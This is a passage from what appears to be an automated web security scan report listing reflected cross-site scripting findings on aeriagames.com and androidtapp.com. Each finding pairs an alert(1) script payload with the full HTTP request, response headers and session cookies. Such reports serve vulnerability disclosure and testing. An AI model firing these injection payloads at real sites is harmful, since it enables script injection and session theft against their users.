P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Content-Length: 1039
Content-Type: text/html

if(!window.c3VTconstVal){c3VTconstVals={c3VJSconst:{c3VJSscriptLimit:0,c3VJScollection:new Array(),c3VJSurl:'v.js',c3VTJSurl:'c3VTabstrct-6-2.php'}};window.c3VTconstVal=c3VTconstVals}if(!window.fireC3VTJSobj){function fireC3VTJS(){this.fireCall=function(){var a=c3VTconstVal.c3VJSconst.c3VJSurl+'.*$';var b=c3VTconstVal.c3VJSconst.c3VTJSurl+"?id=adver&cid=480&t=7222ab3<script>alert(1)</script>aba291a8b78&rv=&uid=&td=";var c=document.getElementsByTagName('script')[0];var e=document.createElement('script');e.type='text/javascript';e.async=true;e.src='http://view.c3metrics.com/'+b;var r=new RegExp(a);var
...[SNIP]...

2.43. http://www.aeriagames.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.aeriagames.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f51ac"><script>alert(1)</script>26b262688fc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icof51ac"><script>alert(1)</script>26b262688fc HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.aeriagames.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Set-Cookie: AGESESSID=253b9e3fed2c000be62f6ab117f20c43; path=/; domain=.aeriagames.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Fri, 01 Apr 2011 16:12:06 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
P3P: CP=\"CAO IDC DSP COR CURa ADMa PSA OUR IND PHY ONL COM STA\"
Content-Type: text/html; charset=utf-8
Date: Fri, 01 Apr 2011 16:12:06 GMT
Server: Aeria Games & Entertainment
Content-Length: 30952


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

<head>
<met
...[SNIP]...
<a lang="en" href="javascript:void(0);" class="mnu3-a" rel="http://www.aeriagames.com/favicon.icof51ac"><script>alert(1)</script>26b262688fc">
...[SNIP]...

2.44. http://www.aeriagames.com/favicon.ico [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.aeriagames.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3b7d3"><script>alert(1)</script>83550672c45 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico?3b7d3"><script>alert(1)</script>83550672c45=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.aeriagames.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Set-Cookie: AGESESSID=5d5f9a7f9719a26b405144a9e452eec3; path=/; domain=.aeriagames.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Fri, 01 Apr 2011 16:12:02 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
P3P: CP=\"CAO IDC DSP COR CURa ADMa PSA OUR IND PHY ONL COM STA\"
Content-Type: text/html; charset=utf-8
Date: Fri, 01 Apr 2011 16:12:02 GMT
Server: Aeria Games & Entertainment
Content-Length: 30979


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

<head>
<met
...[SNIP]...
<a lang="en" href="javascript:void(0);" class="mnu3-a" rel="http://www.aeriagames.com/favicon.ico?3b7d3"><script>alert(1)</script>83550672c45=1">
...[SNIP]...

2.45. http://www.aeriagames.com/meebo.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.aeriagames.com
Path:   /meebo.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d1ddf"><script>alert(1)</script>a6cec7a49b4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /meebo.htmld1ddf"><script>alert(1)</script>a6cec7a49b4?network=aeriagames&lang=en HTTP/1.1
Host: www.aeriagames.com
Proxy-Connection: keep-alive
Referer: http://www.aeriagames.com/favicon.icof51ac%22%3E%3Cscript%3Ealert(1)%3C/script%3E26b262688fc
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AGESESSID=253b9e3fed2c000be62f6ab117f20c43; utm_ref=http://burp/show/40

Response

HTTP/1.1 200 OK
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Fri, 01 Apr 2011 18:17:19 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
P3P: CP=\"CAO IDC DSP COR CURa ADMa PSA OUR IND PHY ONL COM STA\"
Content-Type: text/html; charset=utf-8
Date: Fri, 01 Apr 2011 18:17:19 GMT
Server: Aeria Games & Entertainment
Content-Length: 31114


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

<head>
<met
...[SNIP]...
<a lang="en" href="javascript:void(0);" class="mnu3-a" rel="http://www.aeriagames.com/meebo.htmld1ddf"><script>alert(1)</script>a6cec7a49b4?network=aeriagames">
...[SNIP]...

2.46. http://www.aeriagames.com/themes/main/favicon.ico [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.aeriagames.com
Path:   /themes/main/favicon.ico

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 86f0a"><script>alert(1)</script>7e23ca68d85 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themes/main/favicon.ico86f0a"><script>alert(1)</script>7e23ca68d85 HTTP/1.1
Host: www.aeriagames.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AGESESSID=253b9e3fed2c000be62f6ab117f20c43; utm_ref=http://burp/show/40; __utmz=71836108.1301681874.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=71836108.1321417754.1301681874.1301681874.1301681874.1; __utmc=71836108; __utmb=71836108.1.10.1301681874; meebo-cim=channel%3D82; meebo-cim-session=ad-start-time%3D1301681875296%26start-time%3D1301681875312; __gads=ID=c2b00adb1bb4738d:T=1301681837:S=ALNI_MZdu27SS-zjLAzwIlLA-SFdjLpSBQ

Response

HTTP/1.1 200 OK
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Fri, 01 Apr 2011 18:17:48 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
P3P: CP=\"CAO IDC DSP COR CURa ADMa PSA OUR IND PHY ONL COM STA\"
Content-Type: text/html; charset=utf-8
Date: Fri, 01 Apr 2011 18:17:48 GMT
Server: Aeria Games & Entertainment
Content-Length: 31060


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

<head>
<met
...[SNIP]...
<a lang="en" href="javascript:void(0);" class="mnu3-a" rel="http://www.aeriagames.com/themes/main/favicon.ico86f0a"><script>alert(1)</script>7e23ca68d85">
...[SNIP]...

2.47. http://www.aeriagames.com/themes/main/favicon.ico [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.aeriagames.com
Path:   /themes/main/favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2e0ac"><script>alert(1)</script>f4bce6bc013 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themes/main/favicon.ico?2e0ac"><script>alert(1)</script>f4bce6bc013=1 HTTP/1.1
Host: www.aeriagames.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AGESESSID=253b9e3fed2c000be62f6ab117f20c43; utm_ref=http://burp/show/40; __utmz=71836108.1301681874.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=71836108.1321417754.1301681874.1301681874.1301681874.1; __utmc=71836108; __utmb=71836108.1.10.1301681874; meebo-cim=channel%3D82; meebo-cim-session=ad-start-time%3D1301681875296%26start-time%3D1301681875312; __gads=ID=c2b00adb1bb4738d:T=1301681837:S=ALNI_MZdu27SS-zjLAzwIlLA-SFdjLpSBQ

Response

HTTP/1.1 200 OK
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Fri, 01 Apr 2011 18:17:47 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
P3P: CP=\"CAO IDC DSP COR CURa ADMa PSA OUR IND PHY ONL COM STA\"
Content-Type: text/html; charset=utf-8
Date: Fri, 01 Apr 2011 18:17:47 GMT
Server: Aeria Games & Entertainment
Content-Length: 31087


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

<head>
<met
...[SNIP]...
<a lang="en" href="javascript:void(0);" class="mnu3-a" rel="http://www.aeriagames.com/themes/main/favicon.ico?2e0ac"><script>alert(1)</script>f4bce6bc013=1">
...[SNIP]...

2.48. http://www.androidtapp.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.androidtapp.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ef3b2<script>alert(1)</script>d2de5acaa49 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icoef3b2<script>alert(1)</script>d2de5acaa49 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.androidtapp.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Date: Fri, 01 Apr 2011 15:39:01 GMT
Server: LiteSpeed
Connection: close
X-Pingback: http://www.androidtapp.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8
X-Powered-By: W3 Total Cache/0.9.1.1
Set-Cookie: PHPSESSID=bd8c5d93b8229accde529b3c0d1c1feb; path=/
Last-Modified: Fri, 01 Apr 2011 15:39:01 GMT
Vary: Cookie
Expires: Fri, 01 Apr 2011 16:39:01 GMT
Pragma: public
Cache-Control: public, must-revalidate, proxy-revalidate
ETag: e3aa57f2bc9542101a5bf25621531e29
Vary: User-Agent
Content-Length: 55020

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html
xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"><head
profile
...[SNIP]...
<strong> http://www.androidtapp.com/favicon.icoef3b2<script>alert(1)</script>d2de5acaa49 </strong>
...[SNIP]...

2.49. http://www.androidtapp.com/favicon.icoef3b2%3Cscript%3Ealert(%22DORK%22)%3C/script%3Ed2de5acaa49 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.androidtapp.com
Path:   /favicon.icoef3b2%3Cscript%3Ealert(%22DORK%22)%3C/script%3Ed2de5acaa49

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload b6931<script>alert(1)</script>dcde4a5a5cc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icoef3b2%3Cscript%3Ealert(%22DORK%22)%3Cb6931<script>alert(1)</script>dcde4a5a5cc/script%3Ed2de5acaa49 HTTP/1.1
Host: www.androidtapp.com
Proxy-Connection: keep-alive
Referer: http://www.androidtapp.com/favicon.icoef3b2%3Cscript%3Ealert(%22DORK%22)%3C/script%3Ed2de5acaa49
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=cfd4e1e2237de0ee4f251e86b94bbc2a; GDgkjFlavnmGhFmj=kvGgzkvGumABBBxy; SJECT=CKON; __gads=ID=b4b02331d89ff875:T=1301681709:S=ALNI_MYpSTRZveHosSTXFDXa1dTNOqCBCQ

Response

HTTP/1.1 404 Not Found
Date: Fri, 01 Apr 2011 18:15:50 GMT
Server: LiteSpeed
Connection: close
X-Pingback: http://www.androidtapp.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8
X-Powered-By: W3 Total Cache/0.9.1.1
Last-Modified: Fri, 01 Apr 2011 18:15:50 GMT
Vary: Accept-Encoding, Cookie
Expires: Fri, 01 Apr 2011 19:15:50 GMT
Pragma: public
Cache-Control: public, must-revalidate, proxy-revalidate
ETag: 699ce975eff4981aa59165f787b7046c
Vary: User-Agent
Content-Length: 55461

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html
xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"><head
profile
...[SNIP]...
<strong> http://www.androidtapp.com/favicon.icoef3b2%3Cscript%3Ealert(%22DORK%22)%3Cb6931<script>alert(1)</script>dcde4a5a5cc/script%3Ed2de5acaa49 </strong>
...[SNIP]...

2.50. http://www.androidtapp.com/favicon.icoef3b2%3Cscript%3Ealert(%22DORK%22)%3C/script%3Ed2de5acaa49 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.androidtapp.com
Path:   /favicon.icoef3b2%3Cscript%3Ealert(%22DORK%22)%3C/script%3Ed2de5acaa49

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload d550f<script>alert(1)</script>b00bae0de29 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icoef3b2%3Cscript%3Ealert(%22DORK%22)%3C/script%3Ed2de5acaa49d550f<script>alert(1)</script>b00bae0de29 HTTP/1.1
Host: www.androidtapp.com
Proxy-Connection: keep-alive
Referer: http://www.androidtapp.com/favicon.icoef3b2%3Cscript%3Ealert(%22DORK%22)%3C/script%3Ed2de5acaa49
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=cfd4e1e2237de0ee4f251e86b94bbc2a; GDgkjFlavnmGhFmj=kvGgzkvGumABBBxy; SJECT=CKON; __gads=ID=b4b02331d89ff875:T=1301681709:S=ALNI_MYpSTRZveHosSTXFDXa1dTNOqCBCQ

Response

HTTP/1.1 404 Not Found
Date: Fri, 01 Apr 2011 18:16:05 GMT
Server: LiteSpeed
Connection: close
X-Pingback: http://www.androidtapp.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8
X-Powered-By: W3 Total Cache/0.9.1.1
Last-Modified: Fri, 01 Apr 2011 18:16:05 GMT
Vary: Accept-Encoding, Cookie
Expires: Fri, 01 Apr 2011 19:16:05 GMT
Pragma: public
Cache-Control: public, must-revalidate, proxy-revalidate
ETag: b7dcdde953d73819bf4a18c1ae16e6f1
Vary: User-Agent
Content-Length: 55461

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html
xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"><head
profile
...[SNIP]...
<strong> http://www.androidtapp.com/favicon.icoef3b2%3Cscript%3Ealert(%22DORK%22)%3C/script%3Ed2de5acaa49d550f<script>alert(1)</script>b00bae0de29 </strong>
...[SNIP]...

2.51. http://www.androidtapp.com/favicon.icoef3b2%3Cscript%3Ealert(%22DORK%22)%3C/script%3Ed2de5acaa49 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.androidtapp.com
Path:   /favicon.icoef3b2%3Cscript%3Ealert(%22DORK%22)%3C/script%3Ed2de5acaa49

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 45df4<script>alert(1)</script>2f966fa6030 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icoef3b2%3Cscript%3Ealert(%22DORK%22)%3C/script%3Ed2de5acaa49?45df4<script>alert(1)</script>2f966fa6030=1 HTTP/1.1
Host: www.androidtapp.com
Proxy-Connection: keep-alive
Referer: http://www.androidtapp.com/favicon.icoef3b2%3Cscript%3Ealert(%22DORK%22)%3C/script%3Ed2de5acaa49
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=cfd4e1e2237de0ee4f251e86b94bbc2a; GDgkjFlavnmGhFmj=kvGgzkvGumABBBxy; SJECT=CKON; __gads=ID=b4b02331d89ff875:T=1301681709:S=ALNI_MYpSTRZveHosSTXFDXa1dTNOqCBCQ

Response

HTTP/1.1 404 Not Found
Vary: Accept-Encoding
Date: Fri, 01 Apr 2011 18:15:28 GMT
Server: LiteSpeed
Connection: close
X-Pingback: http://www.androidtapp.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8
X-Powered-By: W3 Total Cache/0.9.1.1
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Fri, 01 Apr 2011 18:15:26 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: User-Agent
Content-Length: 55496

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html
xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"><head
profile
...[SNIP]...
<strong> http://www.androidtapp.com/favicon.icoef3b2%3Cscript%3Ealert(%22DORK%22)%3C/script%3Ed2de5acaa49?45df4<script>alert(1)</script>2f966fa6030=1 </strong>
...[SNIP]...

2.52. http://www.androidtapp.com/wp-admin/css/colors-fresh.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.androidtapp.com
Path:   /wp-admin/css/colors-fresh.css

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 6de6e<script>alert(1)</script>294e246263e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-admin6de6e<script>alert(1)</script>294e246263e/css/colors-fresh.css?ver=20100610 HTTP/1.1
Host: www.androidtapp.com
Proxy-Connection: keep-alive
Referer: http://www.androidtapp.com/wp-login.php
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=b4b02331d89ff875:T=1301681709:S=ALNI_MYpSTRZveHosSTXFDXa1dTNOqCBCQ; PHPSESSID=bd8c5d93b8229accde529b3c0d1c1feb; GDgkjFlavnmGhFmj=kvGgzkvGumABBBxy; SJECT=CKON; wordpress_test_cookie=WP+Cookie+check

Response

HTTP/1.1 404 Not Found
Vary: Accept-Encoding
Date: Fri, 01 Apr 2011 18:16:55 GMT
Server: LiteSpeed
Connection: close
X-Pingback: http://www.androidtapp.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Fri, 01 Apr 2011 18:16:53 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
X-Powered-By: W3 Total Cache/0.9.1.1
Vary: User-Agent
Content-Length: 55436

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html
xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"><head
profile
...[SNIP]...
<strong> http://www.androidtapp.com/wp-admin6de6e<script>alert(1)</script>294e246263e/css/colors-fresh.css?ver=20100610 </strong>
...[SNIP]...

2.53. http://www.androidtapp.com/wp-admin/css/colors-fresh.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.androidtapp.com
Path:   /wp-admin/css/colors-fresh.css

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 9fc92<script>alert(1)</script>085ff8a812c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-admin/css9fc92<script>alert(1)</script>085ff8a812c/colors-fresh.css?ver=20100610 HTTP/1.1
Host: www.androidtapp.com
Proxy-Connection: keep-alive
Referer: http://www.androidtapp.com/wp-login.php
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=b4b02331d89ff875:T=1301681709:S=ALNI_MYpSTRZveHosSTXFDXa1dTNOqCBCQ; PHPSESSID=bd8c5d93b8229accde529b3c0d1c1feb; GDgkjFlavnmGhFmj=kvGgzkvGumABBBxy; SJECT=CKON; wordpress_test_cookie=WP+Cookie+check

Response

HTTP/1.1 404 Not Found
Vary: Accept-Encoding
Date: Fri, 01 Apr 2011 18:17:09 GMT
Server: LiteSpeed
Connection: close
X-Pingback: http://www.androidtapp.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Fri, 01 Apr 2011 18:17:08 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
X-Powered-By: W3 Total Cache/0.9.1.1
Vary: User-Agent
Content-Length: 55436

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html
xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"><head
profile
...[SNIP]...
<strong> http://www.androidtapp.com/wp-admin/css9fc92<script>alert(1)</script>085ff8a812c/colors-fresh.css?ver=20100610 </strong>
...[SNIP]...

2.54. http://www.androidtapp.com/wp-admin/css/colors-fresh.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.androidtapp.com
Path:   /wp-admin/css/colors-fresh.css

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 8ebcd<script>alert(1)</script>46ec459dc7a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-admin/css/colors-fresh.css8ebcd<script>alert(1)</script>46ec459dc7a?ver=20100610 HTTP/1.1
Host: www.androidtapp.com
Proxy-Connection: keep-alive
Referer: http://www.androidtapp.com/wp-login.php
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=b4b02331d89ff875:T=1301681709:S=ALNI_MYpSTRZveHosSTXFDXa1dTNOqCBCQ; PHPSESSID=bd8c5d93b8229accde529b3c0d1c1feb; GDgkjFlavnmGhFmj=kvGgzkvGumABBBxy; SJECT=CKON; wordpress_test_cookie=WP+Cookie+check

Response

HTTP/1.1 404 Not Found
Vary: Accept-Encoding
Date: Fri, 01 Apr 2011 18:17:23 GMT
Server: LiteSpeed
Connection: close
X-Pingback: http://www.androidtapp.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Fri, 01 Apr 2011 18:17:21 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
X-Powered-By: W3 Total Cache/0.9.1.1
Vary: User-Agent
Content-Length: 55436

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html
xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"><head
profile
...[SNIP]...
<strong> http://www.androidtapp.com/wp-admin/css/colors-fresh.css8ebcd<script>alert(1)</script>46ec459dc7a?ver=20100610 </strong>
...[SNIP]...

2.55. http://www.androidtapp.com/wp-admin/css/login.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.androidtapp.com
Path:   /wp-admin/css/login.css

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a5c5f<script>alert(1)</script>7b5a1b70079 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-admina5c5f<script>alert(1)</script>7b5a1b70079/css/login.css?ver=20100601 HTTP/1.1
Host: www.androidtapp.com
Proxy-Connection: keep-alive
Referer: http://www.androidtapp.com/wp-login.php
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=b4b02331d89ff875:T=1301681709:S=ALNI_MYpSTRZveHosSTXFDXa1dTNOqCBCQ; PHPSESSID=bd8c5d93b8229accde529b3c0d1c1feb; GDgkjFlavnmGhFmj=kvGgzkvGumABBBxy; SJECT=CKON; wordpress_test_cookie=WP+Cookie+check

Response

HTTP/1.1 404 Not Found
Vary: Accept-Encoding
Date: Fri, 01 Apr 2011 18:16:53 GMT
Server: LiteSpeed
Connection: close
X-Pingback: http://www.androidtapp.com/xmlrpc.php
